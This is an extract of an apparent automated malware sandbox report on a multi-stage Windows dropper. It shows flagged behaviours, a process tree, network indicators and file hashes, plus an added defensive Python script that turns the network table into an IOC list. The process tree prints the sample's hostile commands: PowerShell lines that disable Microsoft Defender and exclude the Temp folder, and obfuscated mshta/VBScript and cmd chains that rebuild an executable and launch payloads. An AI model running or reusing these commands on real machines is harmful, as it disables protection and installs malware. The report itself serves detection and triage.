| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe
"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe
Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1656 -ip 1656
C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp" /SL5="$50114,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 612
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp" /SL5="$7027C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2276 -ip 2276
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 360
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc46a3cc40,0x7ffc46a3cc4c,0x7ffc46a3cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2604 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3152,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4588 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4128 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5004,i,1029228827005248853,4972208601893091970,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
Network
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
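The network table above mixes sandbox noise (the 8.8.8.8 resolver, reverse lookups, Google and Let's Encrypt OCSP traffic) with the indicators that matter: the queried names, the raw-IP connections that recur on the same high port, and the legitimate services (pastebin.com and, later in the report, iplogger.org and ip-api.com) that the sample abuses and that must not be blocklisted wholesale. The script below is an added example, not part of the sandbox report or its vendor's tooling: it parses rows in the report's layout (both the aligned form and the raw extract where the protocol sits in the host cell) and splits them into blockable domains, raw connections, abused services and beacon candidates. The sample rows are taken from the table; the benign-noise list, the abused-service list and the beacon threshold are assumptions to tune per environment.

```python
"""Turn the sandbox report's network table into a de-duplicated IOC set.

Added example, not part of the report or the sandbox vendor's tooling. The
rows below are taken from the report; the benign-noise and abused-service
lists are assumptions of this script and should be tuned per environment.
"""
from collections import Counter
from dataclasses import dataclass

# Constructed sample: rows from the report's network table, in both layouts
# seen in the extract (empty host cell, or protocol sitting in the host cell).
SAMPLE_ROWS = """\
| NL | 45.9.20.13:80 | | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | staticimg.youtuuee.com | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp |
"""

# Assumed noise: sandbox resolver, mDNS, reverse lookups, Google and Let's Encrypt plumbing.
BENIGN_DESTS = {"8.8.8.8:53", "224.0.0.251:5353"}
BENIGN_HOST_SUFFIXES = (".google.com", ".in-addr.arpa", ".lencr.org")
# Legitimate services the report flags as abused; hunt on them, never block the shared IP.
ABUSED_SERVICES = {"pastebin.com", "iplogger.org", "ip-api.com"}


@dataclass(frozen=True)
class Flow:
    country: str
    ip: str
    port: int
    host: str   # queried or connected hostname; "" for raw IP connections
    proto: str

    @property
    def dest(self):
        return f"{self.ip}:{self.port}"


def parse_rows(text):
    """Parse report rows; a protocol in the third cell means the row has no hostname."""
    flows = []
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        cells += [""] * (4 - len(cells))
        country, dest, c3, c4 = cells[:4]
        host, proto = ("", c3) if c3 in ("tcp", "udp") else (c3, c4)
        ip, _, port = dest.rpartition(":")
        if not port.isdigit():
            continue
        flows.append(Flow(country, ip, int(port), host, proto))
    return flows


def triage(flows, beacon_min=3):
    """Split flows into blockable domains, raw connections, abused services and beacons."""
    domains, abused, hits = set(), set(), Counter()
    for f in flows:
        if f.host in ABUSED_SERVICES:
            abused.add(f.host)          # recorded separately, kept out of the blocklist
            continue
        if f.port == 53 and f.proto == "udp":
            # DNS query: the IOC is the queried name, not the resolver.
            if f.host and not f.host.endswith(BENIGN_HOST_SUFFIXES):
                domains.add(f.host)
            continue
        if f.dest in BENIGN_DESTS or f.host.endswith(BENIGN_HOST_SUFFIXES):
            continue
        hits[f.dest] += 1
        if f.host:
            domains.add(f.host)
    return {
        "domains": sorted(domains),
        "connections": dict(hits),
        "abused": sorted(abused),
        # Repeated raw-IP connections to the same high port look like C2 polling.
        "beacons": sorted(d for d, n in hits.items() if n >= beacon_min),
    }


if __name__ == "__main__":
    for key, value in triage(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

Run against the full table, the repeated connections to 194.104.136.5:46013 and 135.181.129.119:4805 stand out as the polling endpoints, while pastebin.com and its Cloudflare address 104.20.4.235:443 land in the abused bucket rather than the blocklist.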
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | ae5e11ff9817f4f3914d157238282145 |
| SHA1 | 0d3c1e692f917f09a15176eb5fe37ab9e16794b5 |
| SHA256 | de9fbfa62624a865ead2325021738eeef86631758847fc07944e0b3295513332 |
| SHA512 | bf2d1914e1615b70ee0a623786ca57c689e805fc932959f0e410821bdd86cbdeb2916d32a77dae11a7ec1418581fa82052f9ad81e7ada28765f0a65458e225d9 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe
| MD5 | 9b2134ee1ae45204587c324a88830c08 |
| SHA1 | 4829c7a3ce45a7021d57c2da712949d7ea0f2bc6 |
| SHA256 | 3e0591618a8247d00aab0e95297f4250d140a312c52951d4163f5bc34d73af37 |
| SHA512 | 4055e2d5b5134079734b6c273292835ee557df6e4e1f26797084c7b737d99d7b6900b2f4e2563c5af8b051afffac9f2e18a60d57f11885444bf17f222170588d |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/1656-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1656-78-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1656-77-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1656-76-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1656-75-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1656-74-0x0000000064941000-0x000000006494F000-memory.dmp
memory/1656-73-0x00000000007A0000-0x000000000082F000-memory.dmp
memory/1656-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1656-71-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/1656-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1656-85-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1656-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1656-84-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1656-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1656-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe
| MD5 | c1071152823c75363b1fc55759ef2b8a |
| SHA1 | 463ab5487ef7e9e170491dd79e8ab75b2f782ad6 |
| SHA256 | c9ce0e9a228fc8069fc40c7a1cbcf764a1755ac3c26e1ab50b623c55035287fd |
| SHA512 | f4e52c4191128a32ff7ea3b3c06df0d8b648c7ef7e1167ede966a0399401693d7b25ab57393e915b66ff16e5b9ce62e100045e66e0f364673e2a16025de15994 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe
| MD5 | 619aa73b97d9d55df2ab142b8a7d9ae4 |
| SHA1 | 8e6aee5e473f278855887aeae38323e2bbb23b21 |
| SHA256 | 8164fcc1805d268c83bb84cfd42a21e9f85752c13c4d2033f191ed50fc8c47ed |
| SHA512 | ef488b50dc46e8f97701ae3530f0b8ba8dce60274b073b394e4c9344a63bfc852b2628b75b9267f747427ae3f8e52f1e38c00abe0b6bd700fd67eb8524cbaf58 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe
| MD5 | 455c155c134be5785122eb4dd9966b57 |
| SHA1 | 2e9685a7511f53f236869378055d321896827b49 |
| SHA256 | 314846b9ef02e6cfd78a230e3966cee0f6b746a54f05a845e5af2817396ff2f1 |
| SHA512 | 6a0620b30f6fa46ab26eaf06cee1a019d7bca836bc99f090de0c5df45ea6e84aa83070bc8f1f497ed074417702419c5aee00f6e0b40f777d6f6f8be3a69ce793 |
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
memory/3640-100-0x00000000052B0000-0x00000000052E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe
| MD5 | 385ec35e040120516d0d8209c3058e6b |
| SHA1 | 15e04bcae85950c29ba2ae0311a3a444fa3954f5 |
| SHA256 | 4cda6584d780908c63ecd073f88160b7aa03cfbe240345e1e3d60b87bae21e36 |
| SHA512 | 211f04a84b08d1a696498a042fe1c61ccc212bfc4e88595a022145cfe8f228ed08d5d172b210854292dfec3cefb8efc6fcae62e4626a604209f0ea246cb28c7f |
memory/4884-101-0x0000000004ED0000-0x00000000054F8000-memory.dmp
memory/3640-113-0x00000000061D0000-0x0000000006236000-memory.dmp
memory/3640-124-0x0000000006240000-0x0000000006594000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/3000-119-0x0000000000630000-0x0000000000638000-memory.dmp
memory/3720-127-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1480-142-0x00000000029D0000-0x00000000029D6000-memory.dmp
memory/1408-149-0x0000000000720000-0x0000000000786000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2892-147-0x0000000004D60000-0x0000000004D7E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-N455E.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/4680-161-0x00000000055E0000-0x0000000005B84000-memory.dmp
memory/1492-167-0x0000000000400000-0x0000000000414000-memory.dmp
